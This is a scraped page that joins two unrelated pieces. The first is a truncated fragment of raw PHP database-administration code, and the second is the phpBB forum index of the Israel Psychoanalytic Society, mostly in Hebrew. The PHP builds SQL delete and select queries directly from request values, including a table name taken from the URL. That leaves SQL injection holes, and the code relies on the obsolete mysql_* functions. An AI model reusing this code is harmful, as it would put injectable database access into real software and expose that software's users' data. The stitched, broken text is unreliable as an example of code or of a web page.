n"; //************************************************** if(isset($_POST['addrec'])){ // $showall=false; $result=addrecord($tablename, $_SESSION['dbname'], $_POST['array']); }elseif(isset($_POST['add'])){ $showall=false; addform($tablename, $_SESSION['dbname']); }elseif(isset($_POST['delete'])){ //delete record has been pushed // $showall=false; $whr=buildwhr($_POST['pk'], $_POST['pv']); $sql = "delete from $tablename where $whr"; $result=exequery($sql, $tablename, $_SESSION['dbname']); }elseif (isset($_POST['edit'])){//Edit $showall=false; $whr = buildwhr( $_POST['pk'], $_POST['pv']); //$tablename = $_SESSION['tablename']; $sql= "Select * from $tablename where $whr"; $result=exequery($sql, $tablename, $_SESSION['dbname']); editform($tablename, $_SESSION['dbname'], $result, 'edit', $_POST['pk'], $_POST['pv']); }elseif(isset($_POST['editrec'])){ // $showall=false; $result=editrec($_SESSION['dbname'],$tablename, $_POST['pk'], $_POST['pv'], $_POST['array']); } //**************** Search ************************************ if(isset($_POST['searchval'])){ $searchval=$_POST['searchval']; }elseif(isset($_GET['searchval'])){ $searchval=$_GET['searchval']; }else{ $searchval=""; } if (isset($_GET['tablename'])){ $tablename = $_GET['tablename']; } if((isset($_POST['search'])|| isset($searchval)) && $searchval !=""){ $result=searcht($tablename, $_SESSION['dbname'], $searchval); }else{ //Display All $query = "select * from $tablename"; $result=exequery($query, $tablename, $_SESSION['dbname']); } //***************** Display record count ***************************************** if($showall){ $num_rows = mysql_num_rows($result); //Workout whick page to display if(!isset($_GET['pg']) && !isset($pg)){ $beg=0; $pg=0; }else{ if(isset($_GET['pback'])){ $pg=$_GET['pg']; }else{ $pg=$_GET['pg']; } if($pg < 0 ){ $pg=0; } if($pg > $num_rows/$pagemax){ $pg=ceil($num_rows/$pagemax)-1; } $beg = $pg * $pagemax; } if (!isset($_POST['add'])){ $pscrol=" "; $pagescrol =" "; $pagescrol = whichpage($num_rows, $pagemax, $pg, $tablename, $searchval); echo "$pagescroln"; //Display next Top page menu $flds = mysql_num_fields($result); echo"n"; echo"n

 החברה הפסיכואנלטית בישראל
[חזרה לדף השער]
[Register]  [Edit Profile]  [Edit Your Preferences]  [Search]
[Private Messages]  [Memberslist]  [FAQ]  [Login]
Our users have posted a total of -205- Messages.
We have -144- Registered Users.
The newest Registered User is -יואל מילר-.
-2- users are currently browsing the forums.
Not logged in. Login.
  Forum Topics Posts Last Post Moderator
ציבורי לכול הגולשים
הודעות החברה
לוח ההודעות של החברה הפסיכואנלטית בישראל. כאן יפורסמו הרצאות, ימי עיון, הודעות מנהלתיות ועוד. הפורום פתוח לקריאה לכלל הציבור.		 23 23 2008-10-14 20:19
by יורם חזן		 Yitzhak Bloom, יורם חזן,
יואל מילר
פרטי לחברי החברה בלבד
פורום דיוני החברה
מיועד לדיונים בין החברים, על כל נושא הקשור לחברה הפסיכואנלטית בישראל. רק חברים רשומים שאושרו ע"י מנהל הפורום, יוכלו לקרוא ולכתוב בפורום הזה.		 21 182 2006-08-15 14:34
by יורם חזן		 יורם חזן, יואל מילר
= New Posts since your last visit.
= No New Posts since your last visit.
בחזרה לדף השער
Powered by phpBB Version 1.4.0
Copyright © 2000 - 2001 The phpBB Group

phpBB Created this page in 0.081130 seconds.
 אל אינדקס הפורומים